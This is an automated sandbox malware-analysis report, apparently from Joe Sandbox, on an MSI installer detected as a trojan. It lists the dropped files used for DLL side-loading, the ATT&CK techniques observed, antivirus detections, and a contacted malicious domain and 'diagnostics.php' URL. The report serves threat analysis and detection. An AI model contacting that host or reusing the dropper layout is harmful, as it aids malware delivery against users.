    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\TPClntloc.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmnetBridge.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmeventmsg.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\elevate.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_x64.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libEGL.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\ffmpeg.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\adjperm.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\zlib1.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6389.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\sigc-2.0.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\UAC.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\TPClntjpn.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI65EE.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\mksSandbox.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libssl-1_1-x64.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\rufus-4.6p.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\d3dcompiler_47.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_x86.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\gthread-2.0.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6501.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libcds.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libGLESv2.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\basichttp.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6560.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vk_swiftshader.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\TPClntdeu.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmauthd.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_dll_x64.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI659F.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vulkan-1.dllJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: mksSandbox.exe.4.drBinary or memory string: VMware
    Source: mksSandbox.exe.4.drBinary or memory string: Disabling GL due to software/VMware card found.
    Source: mksSandbox.exe.4.drBinary or memory string: Check the mksSandbox.log and vmware.log for more details.
    Source: adjperm.dll.4.drBinary or memory string: 1998-2023 VMware, Inc.@
    Source: mksSandbox.exe.4.drBinary or memory string: VMware VMGI Translator (shader %u)
    Source: sigc-2.0.dll.4.drBinary or memory string: VMware, Inc.1!0
    Source: MSI717A.tmp.4.drBinary or memory string: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmnetBridge.dll
    Source: MSI717A.tmp.4.drBinary or memory string: &{7426186F-614E-467C-B53F-944BB30B0D91}LC:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmnetBridge.dll@
    Source: MSI717A.tmp.4.drBinary or memory string: vmnetBridge.dll@@
    Source: adjperm.dll.4.drBinary or memory string: CreateVMwareGroup
    Source: ffmpeg.dll.4.drBinary or memory string: vmncVMware Screen Codec / VMware Videovp5On2 VP5vp6On2 VP6vp6fOn2 VP6 (Flash version)targaTruevision Targa imageimage/x-targaimage/x-tga
    Source: mksSandbox.exe.4.drBinary or memory string: mks.gl.allowSoftwareAndVMwareDrivers
    Source: sigc-2.0.dll.4.drBinary or memory string: http://www.vmware.com/0/
    Source: sigc-2.0.dll.4.drBinary or memory string: VMware, Inc.1
    Source: MSI717A.tmp.4.drBinary or memory string: vmnetBridge.dll
    Source: adjperm.dll.4.drBinary or memory string: ProductNameVMware WorkstationP
    Source: mksSandbox.exe.4.drBinary or memory string: 8andcallccasecontinuecontinueccutderiv_rtxderiv_rtydiscarddivdp2emitemitThenCutendswitcheqftoiftougeiaddieqigeiltimadimaximinimulineinegishlishritofldld_msltcustomdatamovcnenotorresinforetcround_neround_niround_piround_zsamplesample_csample_c_lzsample_lsample_dsample_bsqrtswitchudivultugeumulumadumaxuminushrutofxordcl_resourcedcl_constantBufferdcl_samplerdcl_indexRangedcl_outputTopologydcl_inputPrimitivedcl_max_output_vertex_countdcl_inputdcl_input_sgvdcl_input_sivdcl_input_psdcl_input_ps_sgvdcl_input_ps_sivdcl_outputdcl_output_sgvdcl_output_sivdcl_tempsdcl_indexableTempdcl_globalFlagsvmwarelodgather4samplepossampleinforeserved1hs_declshs_control_point_phasehs_fork_phasehs_join_phaseemit_streamcut_streamemitThenCut_streaminterface_callbufinfoderiv_rtx_coarsederiv_rtx_finederiv_rty_coarsederiv_rty_finegather4_cgather4_pogather4_po_cf32tof16f16tof32uaddcusubbcountbitsfirstbit_hifirstbit_lofirstbit_shiubfeibfebfibfrevswapcdcl_streamdcl_function_bodydcl_function_tabledcl_interfacedcl_input_control_point_countdcl_output_control_point_countdcl_tess_domaindcl_tess_partitioningdcl_tess_output_primitivedcl_hs_max_tessfactordcl_hs_fork_phase_instance_countdcl_hs_join_phase_instance_countdcl_thread_groupdcl_uav_typeddcl_uav_rawdcl_uav_structureddcl_tgsm_rawdcl_tgsm_structureddcl_resource_rawdcl_resource_structuredld_uav_typedstore_uav_typedld_rawstore_rawld_structuredstore_structuredatomic_andatomic_oratomic_xoratomic_cmp_storeatomic_iaddatomic_imaxatomic_iminatomic_umaxatomic_uminimm_atomic_allocimm_atomic_consumeimm_atomic_iaddimm_atomic_andimm_atomic_orimm_atomic_xorimm_atomic_exchimm_atomic_cmp_exchimm_atomic_imaximm_atomic_iminimm_atomic_umaximm_atomic_uminsyncdadddmaxdmindmuldeqdgedltdnedmovdmovcdtofftodeval_snappedeval_sample_indexeval_centroiddcl_gs_instance_countabortdebug_breakddivdfmadrcpmsaddtoidtouitodutodidivdfrcdrsq
    Source: build.msiBinary or memory string: vmnetBridge.dllx~
    Source: adjperm.dll.4.drBinary or memory string: CompanyNameVMware, Inc.@
    Source: mksSandbox.exe.4.drBinary or memory string: vmware-mksMKSRoleMain: Initializing Preference...
    Source: mksSandbox.exe.4.drBinary or memory string: SPV_EXT_demote_to_helper_invocationSPV_KHR_float_controlsGLSL.std.450VMW.001VMware VMGI Translator (shader %u)%sBufArrayvmgi2spirv: Dynamic constant buffers are not supported.They will always be mapped to buffer 0.
    Source: adjperm.dll.4.drBinary or memory string: name="VMware.VMware.adjperm"
    Source: sigc-2.0.dll.4.drBinary or memory string: noreply@vmware.com0
    Source: MSI717A.tmp.4.drBinary or memory string: VMNETB~1.DLL|vmnetBridge.dll
    Source: mksSandbox.exe.4.drBinary or memory string: vmware
    Source: mksSandbox.exe.4.drBinary or memory string: mks.consolePTUseVMwareVID
    Source: adjperm.dll.4.drBinary or memory string: SeInteractiveLogonRightSOFTWARE\VMware, Inc.\SIDVMware User Group__vmware__
    Source: mksSandbox.exe.4.drBinary or memory string: vmware-mks
    Source: mksSandbox.exe.4.drBinary or memory string: bora\mks\role\common\mksRoleMain.cvmware-%u-mks-%u.logcustom@&!*@*@(msg.log.initFailed)Unable to proceed without a log file.
    Source: mksSandbox.exe.4.drBinary or memory string: vmware-%u-mks-%u.log
    Source: adjperm.dll.4.drBinary or memory string: adjperm.dllCreateVMwareGroupDeleteVMwareGroupLimitFileAccessSecureKeyAdminReadSecureRegEntries<>
    Source: mksSandbox.exe.4.drBinary or memory string: GLBasic: VMwareSVGA3DllvmpipeMesaDisabling GL due to software/VMware card found.
    Source: adjperm.dll.4.drBinary or memory string: DeleteVMwareGroup
    Source: ffmpeg.dll.4.drBinary or memory string: VMware Screen Codec / VMware Video
    Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe "C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe"Jump to behavior
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: Shell_TrayWndKillProcessesUsingInstallation()
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessorJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeCode function: 9_2_00007FF7362F4F68 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_00007FF7362F4F68
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Replication Through Removable Media
    2
    Command and Scripting Interpreter
    1
    DLL Side-Loading
    2
    Process Injection
    21
    Masquerading
    OS Credential Dumping1
    System Time Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Disable or Modify Tools
    LSASS Memory11
    Security Software Discovery
    Remote Desktop ProtocolData from Removable Media2
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Virtualization/Sandbox Evasion
    Security Account Manager1
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive3
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
    Process Injection
    NTDS2
    Process Discovery
    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information
    LSA Secrets11
    Peripheral Device Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
    Software Packing
    Cached Domain Credentials1
    File and Directory Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSync23
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    File Deletion
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1648463 Sample: build.msi Startdate: 25/03/2025 Architecture: WINDOWS Score: 72 25 shaundoose.com 2->25 29 Suricata IDS alerts for network traffic 2->29 31 Antivirus detection for URL or domain 2->31 33 Antivirus detection for dropped file 2->33 35 Multi AV Scanner detection for submitted file 2->35 7 msiexec.exe 139 152 2->7         started        10 msiexec.exe 2 2->10         started        signatures3 process4 file5 17 C:\Windows\Installer\MSI6E8B.tmp, PE32 7->17 dropped 19 C:\Windows\Installer\MSI65EE.tmp, PE32 7->19 dropped 21 C:\Windows\Installer\MSI659F.tmp, PE32 7->21 dropped 23 36 other malicious files 7->23 dropped 12 msiexec.exe 13 7->12         started        15 launcher.exe 3 7->15         started        process6 dnsIp7 27 shaundoose.com 104.21.64.101, 443, 49721 CLOUDFLARENETUS United States 12->27

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    build.msi31%VirustotalBrowse
    build.msi25%ReversingLabsWin32.Trojan.Wincir
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\logd.bat100%AviraBAT/Wincir.chwfc
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.exe0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\TPClntdeu.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\TPClntjpn.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\TPClntloc.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\adjperm.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\basichttp.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\d3dcompiler_47.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\ffmpeg.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\gmodule-2.0.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\gthread-2.0.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libEGL.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libGLESv2.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libcds.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\libssl-1_1-x64.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\mksSandbox.exe0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\elevate.exe0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\UAC.exe0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_dll_x64.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_dll_x86.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_x64.exe0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\resources\extras\clink\clink_x86.exe0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\rufus-4.6p.exe0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\sigc-2.0.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vk_swiftshader.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmauthd.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmclientcore.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmeventmsg.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vmnetBridge.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\vulkan-1.dll0%ReversingLabs
    C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\zlib1.dll0%ReversingLabs
    C:\Windows\Installer\MSI6389.tmp0%ReversingLabs
    C:\Windows\Installer\MSI6501.tmp0%ReversingLabs
    C:\Windows\Installer\MSI6560.tmp0%ReversingLabs
    C:\Windows\Installer\MSI659F.tmp0%ReversingLabs
    C:\Windows\Installer\MSI65EE.tmp0%ReversingLabs
    C:\Windows\Installer\MSI6E8B.tmp0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://www.idpf.org/2007/opfapplication/xhtml0%Avira URL Cloudsafe
    https://www.sumatrapdfreader.org/manualArialwebsiteArial0%Avira URL Cloudsafe
    http://www.gribuser.ru/xml/fictionbook/2.00%Avira URL Cloudsafe
    http://www.daisy.org/z3986/2005/ncx/0%Avira URL Cloudsafe
    https://www.sumatrapdfreader.org/settings/settings3-5-1.html8.330%Avira URL Cloudsafe
    https://www.sumatrapdfreader.org/update-check-rel.txtnotifUpdateCheckInProgress0%Avira URL Cloudsafe
    https://www.sumatrapdfreader.org/docs/Version-history.html0%Avira URL Cloudsafe
    https://www.sumatrapdfreader.org/docs/Keyboard-shortcutssumatrapdfrestrict.inihttps://www.sumatrapdf0%Avira URL Cloudsafe
    https://www.sumatrapdfreader.org/download-free-pdf-viewer-------------0%Avira URL Cloudsafe
    https://www.sumatrapdfreader.org/dl/prerel/PRE_RELEASE_VER/SumatraPDF-prerel0%Avira URL Cloudsafe
    https://www.sumatrapdfreader.org/settings/settings3-5-1.html0%Avira URL Cloudsafe
    https://www.sumatrapdfreader.org/update-check-rel.txt0%Avira URL Cloudsafe
    https://www.sumatrapdfreader.org/dl/rel/SumatraPDF-3.5.2-64.pdb.lzsaI0%Avira URL Cloudsafe
    https://www.sumatrapdfreader.org/URLUpdateInfohttps://www.sumatrapdfreader.org/docs/Version-history.0%Avira URL Cloudsafe
    https://sumatra-website.onrender.com/update-check-rel.txtInstaller64LatestInstaller32InstallerArm64P0%Avira URL Cloudsafe
    https://www.sumatrapdfreader.org/docs/Submit-crash-report.html0%Avira URL Cloudsafe
    https://www.sumatrapdfreader.org/download-free-pdf-viewer0%Avira URL Cloudsafe
    https://www.sumatrapdfreader.org/docs/Corrupted-installation0%Avira URL Cloudsafe
    https://shaundoose.com/diagnostics.phpAI_DOWNGRADE4010AI_PRESERVE_INSTALL_TYPEPreserveInstallTypeAI_100%Avira URL Cloudmalware
    http://www.idpf.org/2007/opf0%Avira URL Cloudsafe

    Download Network PCAP: filteredfull

    NameIPActiveMaliciousAntivirus DetectionReputation
    shaundoose.com
    104.21.64.101
    truetrue
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://api.github.com/repos/%s/releases/latestclink_dll_x86.dll.4.dr, clink_dll_x64.dll.4.drfalse
        high
        https://github.com/chrisant996/clink/issues/57);CHANGES.4.drfalse
          high
          https://www.sumatrapdfreader.org/settings/settings3-5-1.html8.33launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://github.com/chrisant996/clink/issues/107);CHANGES.4.drfalse
            high
            http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#elevate.exe.4.drfalse
              high
              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0rufus-4.6p.exe.4.drfalse
                high
                https://github.com/chrisant996/clink/issues/76);CHANGES.4.drfalse
                  high
                  https://support.google.com/chrome/answer/6098869?hl=eses.pak.4.drfalse
                    high
                    https://support.google.com/chrome/answer/6098869el.pak.4.dr, bg.pak.4.dr, fr.pak.4.drfalse
                      high
                      https://www.google.com/chrome/privacy/eula_text.htmlel.pak.4.dr, bg.pak.4.drfalse
                        high
                        https://github.com/chrisant996/clink/issues/18)CHANGES.4.drfalse
                          high
                          https://www.google.com/chrome/privacy/eula_text.htmlAy&udaGestionadoes.pak.4.drfalse
                            high
                            http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#rufus-4.6p.exe.4.drfalse
                              high
                              https://passwords.google.comcuentaes.pak.4.drfalse
                                high
                                https://www.sumatrapdfreader.org/manualArialwebsiteAriallauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://github.com/mridgers/clink/issues/372)CHANGES.4.drfalse
                                  high
                                  https://github.com/sumatrapdfreader/sumatrapdf/discussions/2316launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                    high
                                    https://chrome.google.com/webstore?hl=es&category=theme81https://myactivity.google.com/myactivity/?ues.pak.4.drfalse
                                      high
                                      https://github.com/chrisant996/clink/issues/41);CHANGES.4.drfalse
                                        high
                                        https://github.com/chrisant996/clink/issues/60);CHANGES.4.drfalse
                                          high
                                          http://docs.oasis-open.org/ns/office/1.2/meta/odf#StylesFilelauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                            high
                                            https://github.com/mridgers/clink/issues/465)CHANGES.4.drfalse
                                              high
                                              https://github.com/mridgers/clink/issues/453)CHANGES.4.drfalse
                                                high
                                                http://www.gribuser.ru/xml/fictionbook/2.0launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://github.com/chrisant996/clink/issues/46);CHANGES.4.drfalse
                                                  high
                                                  https://photos.google.com/settings?referrer=CHROME_NTPel.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drfalse
                                                    high
                                                    https://github.com/chrisant996/clink/issues/69);CHANGES.4.drfalse
                                                      high
                                                      https://github.com/chrisant996/clink/issues/118);CHANGES.4.drfalse
                                                        high
                                                        https://github.com/chrisant996/clink/issues/42);CHANGES.4.drfalse
                                                          high
                                                          https://github.com/chrisant996/clink/issues/114);CHANGES.4.drfalse
                                                            high
                                                            https://www.sumatrapdfreader.org/dl/prerel/PRE_RELEASE_VER/SumatraPDF-prerellauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrlel.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drfalse
                                                              high
                                                              https://chrome.google.com/webstore?hl=elCtrl$1el.pak.4.drfalse
                                                                high
                                                                https://www.sumatrapdfreader.org/update-check-rel.txtnotifUpdateCheckInProgresslauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://github.com/chrisant996/clink/issues/35)CHANGES.4.drfalse
                                                                  high
                                                                  https://passwords.google.comel.pak.4.dr, bg.pak.4.drfalse
                                                                    high
                                                                    https://www.sumatrapdfreader.org/docs/Keyboard-shortcutssumatrapdfrestrict.inihttps://www.sumatrapdflauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://github.com/mridgers/clink/issues/480)CHANGES.4.drfalse
                                                                      high
                                                                      https://aka.ms/winui2/webview2download/Reload():build.msifalse
                                                                        high
                                                                        https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22el.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drfalse
                                                                          high
                                                                          https://www.sumatrapdfreader.org/docs/Version-history.htmllauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.daisy.org/z3986/2005/ncx/launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#elevate.exe.4.drfalse
                                                                            high
                                                                            http://www.idpf.org/2007/opfapplication/xhtmllauncher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://github.com/chrisant996/clinkclink_dll_x86.dll.4.dr, clink_dll_x64.dll.4.drfalse
                                                                              high
                                                                              https://www.google.com/chrome/privacy/eula_text.html&AideGfr.pak.4.drfalse
                                                                                high
                                                                                https://github.com/chrisant996/clink/issues/79);CHANGES.4.drfalse
                                                                                  high
                                                                                  https://github.com/mridgers/clink/issues/516)CHANGES.4.drfalse
                                                                                    high
                                                                                    https://support.google.com/chromebook?p=app_intentel.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drfalse
                                                                                      high
                                                                                      https://chrome.google.com/webstore?hl=frCtrl$1fr.pak.4.drfalse
                                                                                        high
                                                                                        https://github.com/chrisant996/clink/issues/33);CHANGES.4.drfalse
                                                                                          high
                                                                                          https://github.com/mridgers/clink/issues/172)).CHANGES.4.drfalse
                                                                                            high
